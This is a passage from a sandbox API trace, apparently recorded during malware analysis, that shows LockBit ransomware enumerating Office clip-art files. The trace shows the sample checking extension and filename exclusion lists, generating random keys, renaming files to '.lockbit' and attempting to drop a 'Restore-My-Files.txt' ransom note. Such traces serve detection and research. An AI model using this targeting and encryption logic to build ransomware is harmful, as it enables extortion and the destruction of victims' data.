(lpString1="ntuser.dat.log", lpString2="J0216540.WMF") returned 1 [0152.670] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0216540.WMF") returned -1 [0152.670] lstrcmpiW (lpString1="autorun.inf", lpString2="J0216540.WMF") returned -1 [0152.670] lstrcmpiW (lpString1="thumbs.db", lpString2="J0216540.WMF") returned 1 [0152.671] lstrcmpiW (lpString1="iconcache.db", lpString2="J0216540.WMF") returned -1 [0152.671] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.671] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216540.WMF") returned=".WMF" [0152.671] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.671] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.671] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.671] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.671] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.671] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.671] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0152.671] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.671] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.671] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0152.671] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.671] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.671] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.671] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.671] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.672] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.672] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.672] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.672] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.672] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.672] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.672] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.672] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.672] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.672] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.672] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.672] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.672] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.672] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216540.WMF.lockbit") returned 72 [0152.673] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216540.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0216540.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0152.673] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.674] malloc (_Size=0x40068) returned 0x3ef0008 [0152.674] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=42120) returned 1 [0152.674] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.674] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0152.675] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.675] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0152.675] ReadFile (in: hFile=0xec, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0152.680] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216540.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216540.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.680] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.680] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.682] free (_Block=0x1fa2ed8) [0152.682] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216540.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.682] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.682] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.682] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6607e0d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x60dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0216570.WMF", cAlternateFileName="")) returned 1 [0152.682] lstrcmpiW (lpString1=".", lpString2="J0216570.WMF") returned -1 [0152.682] lstrcmpiW (lpString1="..", lpString2="J0216570.WMF") returned -1 [0152.682] PathFindExtensionW (pszPath="J0216570.WMF") returned=".WMF" [0152.682] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.682] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.682] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.682] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.682] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.683] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.683] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.683] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.683] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.683] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.683] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.683] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.683] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0152.683] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.683] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.683] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.685] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.685] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.685] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.690] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.690] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.690] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.690] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.690] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.691] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.691] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.691] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.691] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.691] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.691] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0152.691] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.691] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.691] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.691] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.691] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.691] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.691] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.691] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.691] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.691] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.691] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.691] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.691] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.691] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.691] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.691] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.691] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.691] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0216570.WMF") returned 1 [0152.692] lstrcmpiW (lpString1="ntldr", lpString2="J0216570.WMF") returned 1 [0152.692] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0216570.WMF") returned 1 [0152.692] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0216570.WMF") returned -1 [0152.692] lstrcmpiW (lpString1="autorun.inf", lpString2="J0216570.WMF") returned -1 [0152.692] lstrcmpiW (lpString1="thumbs.db", lpString2="J0216570.WMF") returned 1 [0152.692] lstrcmpiW (lpString1="iconcache.db", lpString2="J0216570.WMF") returned -1 [0152.692] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.692] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216570.WMF") returned=".WMF" [0152.692] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.692] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.692] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.692] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.692] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.692] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.692] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0152.692] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.692] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.692] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0152.692] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.692] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.692] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.692] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.692] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.693] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.693] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.693] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.693] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.693] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.693] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.693] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.693] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.693] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.693] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.693] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.693] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.693] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.693] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216570.WMF.lockbit") returned 72 [0152.693] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216570.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0216570.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0152.694] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.694] malloc (_Size=0x40068) returned 0x3df0008 [0152.694] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=24796) returned 1 [0152.694] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.695] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.695] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0152.695] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.696] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.696] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0152.696] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0152.701] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216570.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216570.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.702] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.702] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.703] free (_Block=0x1fa2ed8) [0152.703] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216570.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.703] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.703] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.703] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x565cf3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1f46, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0216600.WMF", cAlternateFileName="")) returned 1 [0152.703] lstrcmpiW (lpString1=".", lpString2="J0216600.WMF") returned -1 [0152.703] lstrcmpiW (lpString1="..", lpString2="J0216600.WMF") returned -1 [0152.703] PathFindExtensionW (pszPath="J0216600.WMF") returned=".WMF" [0152.703] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.703] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.703] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.703] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.704] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.704] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.704] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.704] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.704] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.704] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.704] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.704] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.704] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0152.704] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.704] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.704] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.704] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.704] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.704] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.704] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.704] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.704] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.704] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.704] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.704] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.705] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.705] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.705] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.705] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.705] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0152.705] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.705] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.705] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.705] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.705] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.705] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.705] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.705] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.705] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.705] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.705] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.705] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.705] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.705] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.705] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.706] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.706] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.706] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0216600.WMF") returned 1 [0152.706] lstrcmpiW (lpString1="ntldr", lpString2="J0216600.WMF") returned 1 [0152.706] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0216600.WMF") returned 1 [0152.706] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0216600.WMF") returned -1 [0152.706] lstrcmpiW (lpString1="autorun.inf", lpString2="J0216600.WMF") returned -1 [0152.706] lstrcmpiW (lpString1="thumbs.db", lpString2="J0216600.WMF") returned 1 [0152.706] lstrcmpiW (lpString1="iconcache.db", lpString2="J0216600.WMF") returned -1 [0152.706] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.706] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216600.WMF") returned=".WMF" [0152.706] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.706] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.706] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.706] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.706] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.706] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.706] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0152.706] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.706] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.706] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0152.707] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.707] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.707] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.707] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.707] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.707] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.707] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.707] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.707] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.707] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.707] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.707] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.707] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.707] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.707] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.707] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.707] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.707] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.707] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216600.WMF.lockbit") returned 72 [0152.708] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216600.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0216600.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0152.708] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.709] malloc (_Size=0x40068) returned 0x1ff1e60 [0152.709] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=8006) returned 1 [0152.709] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.709] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.709] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0152.709] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.710] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.710] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0152.710] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0152.716] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216600.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216600.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.716] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.716] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.717] free (_Block=0x1fa2ed8) [0152.717] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216600.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.717] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.717] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.717] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x565cf3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x24e2, 